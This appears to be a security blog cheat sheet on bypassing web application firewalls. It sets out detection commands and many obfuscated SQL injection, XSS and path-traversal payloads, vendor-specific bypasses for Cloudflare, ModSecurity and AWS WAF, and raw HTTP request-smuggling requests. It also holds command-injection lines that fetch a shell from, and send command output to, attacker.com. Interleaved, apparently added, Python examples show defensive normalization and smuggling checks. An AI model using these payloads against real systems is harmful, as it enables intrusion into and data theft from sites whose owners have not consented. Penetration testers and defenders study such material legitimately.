Kaique Mitsuo Silva Yamamoto
Information Security

WAF Bypass: evading web application firewalls

WAF bypass techniques (ModSecurity, Cloudflare, AWS WAF), encoding, obfuscation, HTTP request smuggling, HTTP/2 desync.

WAFs (Web Application Firewalls) block malicious payloads, but they can be bypassed. Each WAF has its own specific weaknesses, and generic encoding/obfuscation techniques work against most of them.


WAF Detection

# wafw00f (auto-detect)
wafw00f https://target.com

# Common WAF headers
# Cloudflare: cf-ray, server: cloudflare
# AWS WAF: x-amzn-waf-action
# Akamai: Server: AkamaiGHost
# Imperva: X-Iinfo, X-CDN
# Sucuri: X-Sucuri-ID, Server: Sucuri/Cloudproxy
# ModSecurity: possibly visible in error-response headers
# Barracuda: barra_counter, BNI__barracudaLB

# Nmap
nmap --script http-waf-detect -p 80,443 target.com
nmap --script http-waf-fingerprint -p 80,443 target.com

Encoding Bypass

URL Encoding

# Single encoding
%27%20OR%201%3D1--  → ' OR 1=1--

# Double encoding
%2527%2520OR%25201%253D1--  → ' OR 1=1--

# Unicode encoding
%u0027%u0020OR%u00201%u003D1--
%u02BC (apostrophe unicode variant)

# Invalid percent encoding
%27%20OR%201%3D1--
%u0027%20OR%201%3D1--
%c0%27 (overlong UTF-8)
%ef%bc%27 (fullwidth apostrophe)

# Null byte
%00' OR 1=1--

Case mixing

-- SQL
SeLeCt * FrOm users
/*!50000*/ /*!SeLeCt*/ /*!50000*/ /*!FrOm*/ users

-- XSS
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert`1`</SCRIPT>

-- Command injection
;WgEt http://attacker.com/shell
;cUrL http://attacker.com/$(id)

Comment injection

-- SQL
SEL/**/ECT * FR/**/OM users
SEL%2F**%2FECT * FR%2F**%2FOM users
SEL/*!ECT*/ * FR/*!OM*/ users
SEL/*!50000ECT*/ * FR/*!50000OM*/ users
SEL%0AECT * FR%0AOM users  (newline)

-- XSS
<scr<!-- -->ipt>alert(1)</scr<!-- -->ipt>
<scr%00ipt>alert(1)</scr%00ipt>
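The URL/double/unicode encoding, case mixing and comment-splitting variants above all collapse to the same string once a filter canonicalizes its input before matching. The following Python is an added example (not code from the original page) of such a canonicalization step, run over constructed sample inputs; the regex at the end is a single illustrative rule, not a ruleset.

```python
import re
from urllib.parse import unquote

_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")   # IIS-style %uXXXX escapes

def decode_percent(s: str, max_rounds: int = 3) -> str:
    """Undo URL, double-URL and %uXXXX encoding until the text stops changing."""
    for _ in range(max_rounds):
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
        # errors="replace" turns overlong / invalid UTF-8 bytes (%c0%27) into U+FFFD
        # instead of raising, so the rest of the string is still inspected
        decoded = unquote(decoded, errors="replace")
        if decoded == s:
            break
        s = decoded
    return s

def strip_sql_comments(s: str) -> str:
    """Drop /* */ comments; MySQL /*!50000...*/ comments keep their inner text."""
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r"\1", s, flags=re.S)   # /*!50000OR*/ -> OR
    return re.sub(r"/\*.*?\*/", "", s, flags=re.S)             # SEL/**/ECT -> SELECT

def canonicalize(raw: str) -> str:
    """One normal form for all the disguises of a parameter value."""
    s = decode_percent(raw)
    s = s.replace("\x00", "")          # null bytes never belong in a parameter
    s = strip_sql_comments(s)
    s = re.sub(r"[\r\n\t]+", "", s)    # line breaks spliced into keywords (SEL%0AECT)
    s = re.sub(r"\s+", " ", s)         # collapse remaining whitespace
    return s.strip().lower()           # case mixing (SeLeCt) collapses here

def looks_like_tautology(raw: str) -> bool:
    """Match the ' OR 1=1-- family only after canonicalization."""
    return re.search(r"'\s*or\s*1\s*=\s*1\s*--", canonicalize(raw)) is not None

# Constructed samples: eight disguises of the same ' OR 1=1-- payload
SAMPLES = [
    "%27%20OR%201%3D1--",              # single URL encoding
    "%2527%2520OR%25201%253D1--",      # double URL encoding
    "%u0027%u0020OR%u00201%u003D1--",  # %uXXXX encoding
    "%c0%27 OR 1=1--",                 # overlong UTF-8 before the quote
    "%00' OR 1=1--",                   # leading null byte
    "' /**/OR/**/1=1--",               # inline comments
    "' /*!50000OR*/ 1=1--",            # MySQL versioned comment
    "' O%0AR 1=1--",                   # newline inside the keyword
]
```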

String concatenation

-- SQL
CONCAT('SE', 'LEC', 'T')
CONCAT(CHAR(83), CHAR(69), CHAR(76), CHAR(69), CHAR(67), CHAR(84))

-- PHP
${_GET}{'cmd'} (variable functions)
''.`${_GET[0]}`  (template literal concatenation)

-- JavaScript
ale + rt + (1)
window['ale' + 'rt'](1)

HTTP Request Smuggling

CL.TE (Content-Length + Transfer-Encoding)

POST / HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

TE.CL (Transfer-Encoding + Content-Length)

POST / HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-Encoding: chunked

7
PAYLOAD
0

HTTP/2 Request Smuggling

# HTTP/2 → HTTP/1.1 conversion
:method POST
:path /login
:authority target.com
content-type application/x-www-form-urlencoded
content-length 0

GET /admin HTTP/1.1
Host: target.com

Tools

# HTTP Request Smuggler (Burp extension)
# Automates detection of CL.TE and TE.CL

# smuggler.py
python3 smuggler.py -u https://target.com

# h2csmuggler (HTTP/2)
python3 h2csmuggler.py -x https://target.com -u http://internal-host:8080

HTTP/2 Desync Attacks

# If the frontend (HTTP/2) and backend (HTTP/1.1) disagree on parsing:
# HTTP/2 has no CRLF line terminators, but HTTP/1.1 does

# Request via HTTP/2 with a header value containing \r\n
# HTTP/2 frontend: sees a single header
# HTTP/1.1 backend: interprets it as two headers

# Result: request smuggling via protocol confusion
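The CL.TE and TE.CL requests above and the HTTP/2 header-splitting case all rely on two parsers framing one request differently, so the defensive check is to reject the ambiguous request at the edge rather than pick an interpretation. This added Python example (not code from the original page) shows that check for raw HTTP/1.1 requests and for HTTP/2 header lists; the sample requests are constructed and use the placeholder host example.test.

```python
import re

def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body

def h1_findings(raw: bytes) -> list:
    """Reasons a strict HTTP/1.1 front end should reject the request (RFC 7230 3.3.3)."""
    _, headers, body = parse_request(raw)
    cl = [v for n, v in headers if n == b"content-length"]
    te = [v for n, v in headers if n == b"transfer-encoding"]
    findings = []
    if cl and te:
        findings.append("Content-Length and Transfer-Encoding both present (CL.TE/TE.CL ambiguity)")
    for v in te:
        # only a bare 'chunked' is accepted; variants are what two parsers disagree on
        if v.lower() != b"chunked":
            findings.append("non-canonical Transfer-Encoding value %r" % v)
    for v in cl:
        if not v.isdigit():
            findings.append("non-numeric Content-Length %r" % v)
        elif int(v) != len(body):
            findings.append("Content-Length %d does not match body length %d" % (int(v), len(body)))
    return findings

def h2_findings(headers) -> list:
    """Refuse HTTP/2 fields that would become extra HTTP/1.1 lines when re-serialised."""
    findings = []
    for name, value in headers:
        if re.search(r"[\r\n\x00]", name + value):
            findings.append("CR/LF/NUL inside header %r" % name)
        if not re.fullmatch(r"[a-z0-9!#$%&'*+.^_`|~-]+|:[a-z]+", name):
            findings.append("invalid header name %r" % name)   # e.g. 'foo: bar'
    return findings

# Constructed samples mirroring the CL.TE and TE.CL requests shown above
CL_TE = (b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 6\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nG")
TE_CL = (b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 3\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n7\r\nPAYLOAD\r\n0\r\n\r\n")
CLEAN = b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\n\r\nq=abc"
H2_SPLIT = [(":method", "POST"), ("foo", "bar\r\nTransfer-Encoding: chunked")]  # CRLF in a value
```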

Filter bypass by WAF

Cloudflare

# SQLi bypass
' UNION/**/SELECT/**/1,2,3--
' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--
' u%6Eion s%65lect 1,2,3--  (hex encoding of keyword characters)
' UNION(SELECT(1),2,3)--  (extra parentheses)
' AND 1=2 UNION SELECT 1,2,3 FROM users--

# XSS bypass
<img/src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body/onload=alert(1)>
<details/open/ontoggle=alert(1)>
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>

# LFI bypass
....//....//etc/passwd
....\/....\/etc/passwd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252fetc/passwd

ModSecurity (OWASP CRS)

# SQLi
' UNION ALL SELECT 1,2,3--
' /**/UNION/**/SELECT/**/1,2,3--
' +UNION+SELECT+1,2,3--
' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--

# XSS
<img src=x onerror=&#97;lert(1)>
<img src=x onerror=eval.call(null,'al'+'ert(1)')>

# Partial rule bypass
# ModSecurity CRS uses regexes → look for gaps in the regex
# Test payloads incrementally

AWS WAF

# AWS WAF is based on managed rule groups
# Bypass via encoding + case alternation

# Request body → JSON
# If the WAF inspects the body but not nested JSON:
{"data": {"query": "' OR 1=1--"}}

# Multipart form
# If the WAF does not parse multipart correctly:
------WebKitFormBoundary
Content-Disposition: form-data; name="search"

' OR 1=1--
------WebKitFormBoundary
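Both gaps above come down to the WAF not seeing every value the application will eventually read. The added Python example below (not code from the page or from AWS) walks a JSON body recursively and a multipart body part by part so that each value reaches the rule; the rule itself, the boundary and the sample bodies are constructed for illustration.

```python
import json
import re
from email.parser import BytesParser
from email.policy import default

TAUTOLOGY = re.compile(r"'\s*or\s*1\s*=\s*1\s*--", re.I)   # one example rule, not a ruleset

def json_leaves(value, path="$"):
    """Yield (json_path, text) for every string leaf, however deeply nested."""
    if isinstance(value, dict):
        for k, v in value.items():
            yield from json_leaves(v, f"{path}.{k}")
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from json_leaves(v, f"{path}[{i}]")
    elif isinstance(value, str):
        yield path, value

def multipart_fields(content_type: str, body: bytes):
    """Yield (field name, text) for each part of a multipart/form-data body."""
    # the stdlib MIME parser applies the boundary rules; we only prepend the header
    msg = BytesParser(policy=default).parsebytes(
        b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        yield name, part.get_payload(decode=True).decode("utf-8", "replace")

def inspect_body(content_type: str, body: bytes) -> list:
    """Return [(location, value)] for every text value the rules must see,
    regardless of how deeply the body format nests it."""
    media_type = content_type.split(";")[0].strip().lower()
    if media_type == "application/json":
        return list(json_leaves(json.loads(body)))
    if media_type == "multipart/form-data":
        return list(multipart_fields(content_type, body))
    return [("body", body.decode("utf-8", "replace"))]

def flagged(content_type: str, body: bytes) -> list:
    """Locations whose value matches the example rule."""
    return [loc for loc, val in inspect_body(content_type, body) if TAUTOLOGY.search(val)]

# Constructed samples: the nested-JSON and multipart bodies from the section above
JSON_BODY = b'{"data": {"query": "\' OR 1=1--", "page": 1}, "tags": ["a", "b"]}'
BOUNDARY = "----WebKitFormBoundaryExample"
MULTIPART_CT = f"multipart/form-data; boundary={BOUNDARY}"
MULTIPART_BODY = (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="search"\r\n\r\n'
                  f"' OR 1=1--\r\n--{BOUNDARY}--\r\n").encode()
```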

Generic WAF Bypass Techniques

1. Encoding
   → URL encode, double encode, unicode
   → Hex encoding of characters
   → Base64 in parameters

2. Case variation
   → uNiOn SeLeCt
   → <ScRiPt>

3. Comment injection
   → SEL/**/ECT
   → <scr<!-- -->ipt>

4. Null bytes
   → %00 before the payload
   → works in some parsers

5. HTTP method change
   → GET → POST, POST → GET
   → PUT, PATCH, DELETE

6. Content-Type variation
   → application/json → application/xml
   → multipart/form-data

7. Header manipulation
   → X-Forwarded-For: 127.0.0.1
   → X-Originating-IP: 127.0.0.1

8. Rate limiting bypass
   → Slow down requests
   → Rotate IPs/proxies

9. Protocol downgrade
   → HTTP/2 → HTTP/1.1
   → WebSocket upgrade

10. Chunked transfer
    → Transfer-Encoding: chunked
    → Split the payload across chunks
